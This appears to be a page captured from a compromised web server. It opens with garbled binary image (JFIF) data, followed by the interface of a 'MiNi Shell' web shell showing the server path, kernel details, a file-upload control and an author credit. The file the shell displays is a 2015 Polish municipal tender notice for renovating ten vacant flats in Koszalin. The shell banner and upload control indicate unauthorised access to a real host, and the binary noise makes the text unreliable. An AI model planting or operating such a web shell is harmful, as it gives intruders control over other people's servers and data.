JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151229/355102-N-2015.html

<p class="kh_header"><b>Koszalin: Remont pustostanów położonych w Koszalinie przy ul. Przemysłowej 4D/17, 
ul. Zwycięstwa 80/3, ul. Połczyńskiej 67E/4, ul. Piłsudskiego 79/5, ul. Broniewskiego 4/18, ul. Batalionów Chłopskich 8/2, ul. Batalionów Chłopskich 80/1, ul. Bałtyckiej 12/3, ul. Księżnej Anastazji 1/1, ul. Łużyckiej 42b/1</b><br>
<b>Numer ogłoszenia: 355102 - 2015; data zamieszczenia: 29.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Koszalin Zarząd Budynków Mieszkalnych , ul. Połczyńska 24, 75-815 Koszalin, woj. zachodniopomorskie, tel. 094 3409106, 3409107, faks 094 3409196.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ZBM.KOSZALIN.IBIP.PL</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pustostanów położonych w Koszalinie przy ul. Przemysłowej 4D/17, 
ul. Zwycięstwa 80/3, ul. Połczyńskiej 67E/4, ul. Piłsudskiego 79/5, ul. Broniewskiego 4/18, ul. Batalionów Chłopskich 8/2, ul. Batalionów Chłopskich 80/1, ul. Bałtyckiej 12/3, ul. Księżnej Anastazji 1/1, ul. Łużyckiej 42b/1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont pustostanów położonych w Koszalinie przy ul. Przemysłowej 4D/17, ul. Zwycięstwa 80/3, ul. Połczyńskiej 67E/4, ul. Piłsudskiego 79/5, ul. Broniewskiego 4/18, ul. Batalionów Chłopskich 8/2, ul. Batalionów Chłopskich 80/1, ul. Bałtyckiej 12/3, ul. Księżnej Anastazji 1/1, ul. Łużyckiej 42b/1.

Zakres zamówienia obejmuje m.in.:

1. pustostan przy ul. Przemysłowej 4D/17:
1.1. roboty remontowe i renowacyjne, w tym. m.in.:
odgrzybienie ścian,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi,
zakup i montaż kuchenki elektrycznej 2-płytowej,
wymiana miski ustępowej,
wymiana sedesu z tworzywa,
wymiana płuczki ustępowej z zaworem pływakowym,
wymiana brodzika blaszanego;

2. pustostan przy ul. Zwycięstwa 80/3:
2.1. roboty remontowe i renowacyjne, w tym m.in.:
gruntowanie powierzchni,
posadzki z wykładzin z tworzyw sztucznych,
listwy przyścienne z polichlorku winylu,
wymiana progów drzwiowych,
wykucie z muru ościeżnic  drewnianych,
obsadzenie ościeżnic stalowych
skrzydła drzwiowe wewnętrzne, wejściowe,
skrzydła drzwiowe wewnątrz lokalowe,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi grzejników oraz rur,
montaż kuchni gazowej 4-palnikowej,
ustęp z płuczką typu kompakt
próba ciśnieniowa instalacji gazowej

3. pustostan przy ul. Połczyńskiej 67E/4:
3.1. roboty remontowe i renowacyjne, w tym m. in.:
gruntowanie powierzchni,
posadzki z wykładzin z tworzyw sztucznych rulonowych,
listwy przyścienne z polichlorku winylu,
wymiana progów drzwiowych,
wykucie z muru ościeżnic  drewnianych,
obsadzenie ościeżnic stalowych
skrzydła drzwiowe wewnętrzne, wejściowe,
skrzydła drzwiowe wewnątrz lokalowe,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi stolarki okiennej
wymiana zlewozmywaka dwukomorowego wraz z baterią, 
wymiana syfonu,

3.2. roboty elektryczne, w tym m. in.:
przebicie otworów w ścianach,
wykucie bruzd pod przewody,
układanie przewodów,
montaż osprzętu elektrycznego,
montaż dzwonka 230V,
montaż tablicy TM (2x12)
sprawdzenie i pomiar obwodu elektrycznego NN 1 i 3-fazowego,
badania i pomiary: skuteczności zerowania, wyłącznika różnicoprądowego,
montaż kuchenki elektrycznej 230/400V

4. pustostan przy ul. Piłsudskiego 79/5:
4.1. roboty remontowe i renowacyjne, w tym m. in.:
rozebranie posadzek z płytek, tworzyw sztucznych
zerwanie starych tapet,
ułożenie warstwy wyrównawczej,
ułożenie posadzki z wykładzin z tworzyw sztucznych,
wymiana ościeżnic,
skrzydła drzwiowe wewnętrzne,
przetarcie tynków wewnętrznych,
malowanie farbami emulsyjnymi,
ułożenie płytek, ściennych 30x30 cm,
malowanie farbami olejnymi, rur, grzejników,
demontaż pawlacza,
wymiana okien zespolonych uchylnych,
tynkowanie,
obsadzenie kratek wentylacyjnych,
malowanie farbą ftalową,

4.2. roboty elektryczne, w tym m. in.:
przebicie otworów w ścianach,
wykucie bruzd pod przewody,
układanie przewodów,
montaż osprzętu elektrycznego,
montaż dzwonka 230V,
montaż tablicy TM,
sprawdzenie i pomiar obwodu elektrycznego NN 1 i 3-fazowego,
badania i pomiary: skuteczności zerowania, wyłącznika różnicoprądowego,

4.3. roboty sanitarne, w tym m. in.:
wymiana pieca gazowego wieloczerpalnego,
wymiana miski ustępowej porcelanowej,
wymiana sedesu z elementami z tworzywa,
wymiana wanny żeliwnej,
wymiana baterii, 
wymiana syfonu o średnicy 50 mm,
wymiana umywalki,
wymiana kuchni gazowej 3-4 palnikowej z piekarnikiem.

5. pustostan przy ul. Broniewskiego 4/18:
5.1. roboty remontowe i renowacyjne, w tym m. in.:
demontaż posadzek z deszczułek nie nadających się do ponownego wbudowania,
warstwa wyrównawcza,
ułożenie posadzek z wykładzin z tworzyw sztucznych
wykucie ościeżnic stalowych,
obsadzenie ościeżnic,
skrzydła drzwiowe wejściowe wewnętrzne,
tynkowanie,
malowanie farbami emulsyjnymi,
wymiana okien zespolonych rozwiernych i uchylno-rozwiernych, 
cyklinowanie posadzek,
lakierowanie posadzek

5.2. roboty elektryczne, w tym m. in.:
przebicie otworów w ścianach,
wykucie bruzd pod przewody,
układanie przewodów,
montaż osprzętu elektrycznego,
montaż dzwonka 230V,
montaż tablicy TM (1x12),
montaż kuchenki elektrycznej o mocy do 3,5 kW
sprawdzenie i pomiar obwodu elektrycznego NN 1 i 3-fazowego,
badania i pomiary: skuteczności zerowania, wyłącznika różnicoprądowego,

5.3. roboty sanitarne, w tym m. in.:
wymiana zlewu żeliwnego emaliowanego,
wymiana zaworu czerpalnego o srednicy 15 mm, 
wymiana syfonu o średnicy 50 mm,

6. pustostan przy ul. Batalionów Chłopskich 8/2:
6.1. roboty remontowe i renowacyjne, w tym m.in.:
wymiana posadzki z tworzyw sztucznych,
wymiana progów drzwiowych,
wykucie ościeżnic drewnianych i obsadzenie ościeżnic stalowych,
skrzydła drzwiowe wewnętrzne,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi,
wymiana ustępu z miską porcelanową typu kompakt,
próba ciśnieniowa inst. gazowej,
opinia kominiarska,

6.2. roboty elektryczne, w tym m.in.:
przebicie otworów w ścianach,
wykucie bruzd pod przewody,
układanie przewodów,
montaż osprzętu elektrycznego,
montaż dzwonka 230V,
montaż tablicy TM (1x12),
montaż kuchenki elektrycznej o mocy do 3,5 kW
sprawdzenie i pomiar obwodu elektrycznego NN 1-fazowego,
badania i pomiary skuteczności zerowania, 

7. pustostan przy ul. Batalionów Chłopskich 80/1:
7.1. roboty remontowe i renowacyjne, w tym m.in.:
wymiana posadzki z tworzyw sztucznych,
wymiana progów drzwiowych,
wykucie ościeżnic drewnianych i obsadzenie ościeżnic stalowych,
skrzydła drzwiowe wewnętrzne,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi ścian, rur wodociągowych i gazowych,
wymiana kuchenki gazowej 4-palnikowej,
wymiana ustępu z miską porcelanową typu kompakt,
zakup i montaż grzejnika elektrycznego,
próba ciśnieniowa instalacji gazowej,
opinia kominiarska,

7.2. roboty elektryczne, w tym m.in.:
przebicie otworów w ścianach,
wykucie bruzd pod przewody,
układanie przewodów,
montaż osprzętu elektrycznego,
montaż dzwonka 230V,
montaż tablicy TM (1x12),
montaż grzejnika elektrycznego do 1,0kW/230 V,
sprawdzenie i pomiar obwodu elektrycznego NN 1 i 3-fazowego,
badania i pomiary: skuteczności zerowania, wyłącznika różnicoprądowego,

8. pustostan przy ul. Bałtyckiej 12/3, w tym m. in.:
gruntowanie powierzchni,
posadzki z wykładzin z tworzyw sztucznych,
listwy przyścienne z polichlorku winylu,
wymiana progów drzwiowych,
wykucie z muru ościeżnic  drewnianych,
obsadzenie ościeżnic stalowych
skrzydła drzwiowe wewnątrz lokalowe,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi grzejników oraz rur,
wymiana kuchni gazowej 4-palnikowej,
wymiana ustępu z miska porcelanową typu kompakt,
próba ciśnieniowa instalacji gazowej,
demontaż szafy wnękowej,
wymiana wanny stalowej,
wymiana zlewozmywaka ,
wymiana umywalki fajansowej,
wymiana pieca gazowego jednoczerpalnego,
opinia kominiarska,

9. pustostan przy ul. Księżnej Anastazji 1/1:
9.1. roboty remontowe i renowacyjne:
wymiana okien skrzynkowych rozwiernych i uchylno-rozwiernych,
wymian posadzek z tworzyw sztucznych,
wymiana płyt podłogowych,
zerwanie starych tapet,
demontaż okładziny  ściennej,
malowanie farbami emulsyjnymi,
demontaż pawlacza,
wymiana ościeżnic,
skrzydła drzwiowe wewnętrzne,
malowanie farbą olejna rur, grzejników, stolarki okiennej,
obsadzenie kratek wentylacyjnych,
demontaż szafy wnękowej i licznikowej,
wymiana podokienników,
wymiana progów drzwiowych,

9.2. roboty elektryczne, w tym m. in.:
przebicie otworów w ścianach,
wykucie bruzd pod przewody,
układanie przewodów,
montaż osprzętu elektrycznego,
montaż dzwonka 230V,
montaż tablicy TM (1x12) wraz z osprzętem,
sprawdzenie i pomiar obwodu elektrycznego NN 1-fazowego,
badania i pomiary: skuteczności zerowania, wyłącznika różnicoprądowego,

9.3. roboty sanitarne, w tym m. in.:
wymiana rurociągów,
demontaż podejścia do gazomierza,
wymiana kuchni gazowej z piekarnikiem,
demontaż pieca gazowego wieloczerpalnego,
montaż podgrzewacza (terma) gazowego wody,
wymiana wanny,
wymiana baterii,
montaż zlewozmywaka  z blachy,
wymiana urządzeń sanitarnych,

10. pustostan przy ul. Łużyckiej 42B/1:
10. 1. roboty remontowe i renowacyjne, w tym m. in.:
wymiana ościeżnic,
skrzydła drzwiowe wewnętrzne,
wymiana posadzek z tworzyw sztucznych,
malowanie farbami emulsyjnymi,
malowanie farbami olejnymi grzejników, rur wodociągowych i gazowych,
obsadzenie kratek wentylacyjnych,
zerwanie starych tapet,
demontaż okładziny ściennej,
demontaż posadzek z płytek z kamieni sztucznych,
wymiana progów drzwiowych,

10.2. roboty elektryczne, w tym m. in.:
przebicie otworów w ścianach,
wykucie bruzd pod przewody,
układanie przewodów,
montaż osprzętu elektrycznego,
montaż dzwonka 230V,
montaż tablicy TM (1x12) wraz z osprzętem,
sprawdzenie i pomiar obwodu elektrycznego NN 1-fazowego,
badania i pomiary: skuteczności zerowania, wyłącznika różnicoprądowego,

10.3. roboty sanitarne, w tym m. in.:
wymiana rurociągów,
demontaż podejścia do gazomierza,
wymiana kuchni gazowej z piekarnikiem,
demontaż pieca gazowego wieloczerpalnego,
montaż podgrzewacza (terma) gazowego wody,
wymiana wanny,
wymiana baterii,
montaż zlewozmywaka  z blachy,
wymiana urządzeń sanitarnych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.30.00.00-0, 45.31.00.00-3, 45.45.31.00-8, 45.33.00.00-9, 45.40.00.00-1, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2.500 zł (słownie: dwa tysiące pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę winien wykazać, że:  
     w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 
	dwie prace polegające na wykonaniu robót budowlanych w rozumieniu przepisów ustawy z dnia 07 lipca 1994 r. Prawo budowlane (Dz.U z 2013 r. poz 1409 z późn. zm.) każda o wartości nie mniejszej niż 80.000,00 zł brutto i obejmująca budowę lub przebudowę lub remont budynków lub lokali</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował jedną osobą przewidzianą do pełnienia funkcji kierownika budowy, która posiada uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej, co najmniej w ograniczonym zakresie - zgodnie z rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów umożliwiające kierowanie robotami w zakresie przewidzianym opisem przedmiotu zamówienia;
- doświadczenie zawodowe po uzyskaniu uprawnień obejmujące co najmniej 24 miesiące przy realizacji robót elektrycznych jako kierownik budowy lub kierownik robót (w rozumieniu art. 12 ust. 1 pkt.2 ustawy Prawo Budowlane).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia - załącznik nr 3 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - gwarancja - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zbm.koszalin.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> zbm.koszalin.ibip.pl lub w siedzibie zamawiającego ul. Połczyńska 24, 75-815 Koszalin, pokój nr 108.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.01.2016 godzina 09:55, miejsce: oferty należy składać w siedzibie zamawiającego ul. Połczyńska 24, 75-815 Koszalin, pokój nr 307.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com